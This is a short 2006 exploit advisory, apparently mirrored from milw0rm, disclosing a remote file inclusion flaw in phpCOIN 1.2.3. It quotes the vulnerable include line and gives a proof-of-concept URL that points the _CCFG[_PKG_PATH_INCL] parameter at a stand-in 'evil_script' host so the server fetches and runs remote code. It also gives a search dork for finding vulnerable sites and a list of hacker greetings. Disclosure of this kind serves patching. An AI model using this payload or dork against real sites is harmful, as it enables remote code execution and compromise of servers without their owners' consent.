Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21542] Wikepage "lng" Local File Inclusion Vulnerability

pSlash v0.7 (lvc_include_dir) Remote Include Vulnerability

From:	timq_(at)_hackernetwork.com <timq_(at)_hackernetwork.com>
Date:	25.08.2006
Subject:	phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org
##################################################################

Vulnerable: require_once include ($_CCFG['_PKG_PATH_INCL'].'redirect.php');

###################################################################

Exploit PoC:

http://www.site.com/[path]/coin_includes/constants.
php?_CCFG[_PKG_PATH_INCL]=http://evil_script?

Dork: Powered By phpCOIN 1.2.3
####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,BliTz,Splinter,InTel,ErazerZ,Maggot,PunKerX,
Infiltration

#####################################################################

# milw0rm.com [2006-08-24]